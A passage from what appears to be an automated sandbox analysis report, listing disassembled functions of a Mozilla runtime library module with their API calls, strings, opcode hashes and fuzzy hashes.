                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 88d358702449e3305df76f2511affd15ce607cb4afa5c2ecfe253dc97982395a
                                                                                                                                                                                                                                                                                        • Instruction ID: c9c9524b657ccc087bd5cb93b7a44d8903106ebe46c449954094d16bfa9ea759
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88d358702449e3305df76f2511affd15ce607cb4afa5c2ecfe253dc97982395a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2E03076704618ABCB10EFA8DC4888B77ACEF492703150525E691D3700D231F905CBA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7985B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7985D3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C798725
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                        • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                        • Opcode ID: 395b1801a9c8a67e954a05367460949540f378eabee3d435d965fd81a986beee
                                                                                                                                                                                                                                                                                        • Instruction ID: 1ac10404ac50e533c001f86a89516b5963be5eea07f2885ce505dd48e9fa7516
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 395b1801a9c8a67e954a05367460949540f378eabee3d435d965fd81a986beee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF5156B46046458FD701CF28D288B5ABBF1BF4A318F18C19AD8599FB52C375E885CF92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C74BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C74BDEB
                                                                                                                                                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74BE8F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 0265d5c067fcece2cfaa0a9c195e68d96c2f56eecbb1924ff4d8117932b61fdf
                                                                                                                                                                                                                                                                                        • Instruction ID: 1f63a3d0a928d81ff242905b0a0d039fd0b8550528cd589327ba341db5b6024a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0265d5c067fcece2cfaa0a9c195e68d96c2f56eecbb1924ff4d8117932b61fdf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8419E71909B45CFC711CF38C581A9FB7F8AF8A348F008A6DF995A7611D730E9498B82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C783CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C783D19
                                                                                                                                                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C783D6C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                                                        • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                        • Opcode ID: 39e729063480a936c587b073fd643718c04c64068c222a7d5d24cc9d3c58d492
                                                                                                                                                                                                                                                                                        • Instruction ID: 7fcaff0fed85198c87cf353888a221dd8971649ff2e943226d2a0d444b46711c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39e729063480a936c587b073fd643718c04c64068c222a7d5d24cc9d3c58d492
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32112731E04A89DBDB048F6DC91A8EDB775EF96318B449338DD459B602FB30A5C4C3A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C7A6E22
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7A6E3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C7A6E1D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                        • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                        • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                        • Opcode ID: fa2a20c7444f4e1de79e2db28292d133fe0e3d73286f3efe966e183036092f4e
                                                                                                                                                                                                                                                                                        • Instruction ID: 8348385f79bd6f23ea3782ef5d8b46225d41a5818734a61a8091d1d02cdb37a7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa2a20c7444f4e1de79e2db28292d133fe0e3d73286f3efe966e183036092f4e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24F0E975749242CFEF109BBCCB58A917775B713318F040275C81556B61D721B74BCAA3
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C759E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C759EEF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID: Infinity$NaN
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                                                        • Opcode ID: a4fd6e4d1b8499a7fed50f2ae25c41d6a10edfc1e87ac6a5021301f9c81a4086
                                                                                                                                                                                                                                                                                        • Instruction ID: 3c581bb69d12e84ba3b60eebc67180744f7ee6594b8055e7c63c670d46e527e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4fd6e4d1b8499a7fed50f2ae25c41d6a10edfc1e87ac6a5021301f9c81a4086
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DF0C2B1700A47CFDB00CF28DA6BB803371B31332AF204A38D5040AB40D735A79ACA92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C756C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kxl,?,6C784B30,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C756C42
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kxl,?,6C784B30,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C756C58
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: moz_xmalloc$malloc
                                                                                                                                                                                                                                                                                        • String ID: 0Kxl
                                                                                                                                                                                                                                                                                        • API String ID: 1967447596-239246097
                                                                                                                                                                                                                                                                                        • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                                                        • Instruction ID: 6416bc1c01f24207c94e788448da95706e92f6849a06973467900fae0c1e39c9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FE026F1E101000A9B0898789E0DA2A75C99B182AB7844A35E822C2BC9FF14F670C191
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C79B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B628
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B67D
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B708
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C79B127,?,?,?,?,?,?,?,?), ref: 6C79B74D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 17fd36a3caba64a46c9ca976b5f224a634d1a608f76e93be242f2caa464b1f35
                                                                                                                                                                                                                                                                                        • Instruction ID: 07a5247b59b7628f475f15d6641e4c6f1096e9198958d573abc469288fce4968
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17fd36a3caba64a46c9ca976b5f224a634d1a608f76e93be242f2caa464b1f35
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD51D071A01216CFDB24CF68EA8475EB7B5FF85304F45862EC85AAB701D731B804CBA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C796E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C796EAB
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C796EFA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C796F1E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C796F5C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9b5664a8a1e2d7853b45f299d7e00caa5bdae6b63ec92022c6b701defcba7275
                                                                                                                                                                                                                                                                                        • Instruction ID: 625f8827d813ba1e2621973177503f232dab5af52f66c01a14d8f09507f01afc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b5664a8a1e2d7853b45f299d7e00caa5bdae6b63ec92022c6b701defcba7275
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7431E471A1060A8FDB44CF2CDE806AA73EAFB84344F548239D41AC7651EB31E659C7A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7AB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C750A4D), ref: 6C7AB5EA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C750A4D), ref: 6C7AB623
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C750A4D), ref: 6C7AB66C
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C750A4D), ref: 6C7AB67F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc$free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4e15c90162785178e0cd61ad5f76a2a29df968ea5f3e1bc72366aa398bae6676
                                                                                                                                                                                                                                                                                        • Instruction ID: 3dbc63f8d11e368b081126309cd503fdc54df15ad3578aa00ece628e95c9be41
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e15c90162785178e0cd61ad5f76a2a29df968ea5f3e1bc72366aa398bae6676
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A631D671A0121A8FDB10CFA8C94465AB7B5FF81305F1A8679D8069B211DB31F916CBA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C77F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C77F611
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C77F623
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C77F652
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C77F668
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                        • Instruction ID: 4366504716ec07e601f2c16806ffd7f92f7e02c55777bbb8d413dc7bbdd6f5c2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A315171A00218AFCB24CF6DCEC4A9F77B5EF84354B148539FA498BB05D631E9448BA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%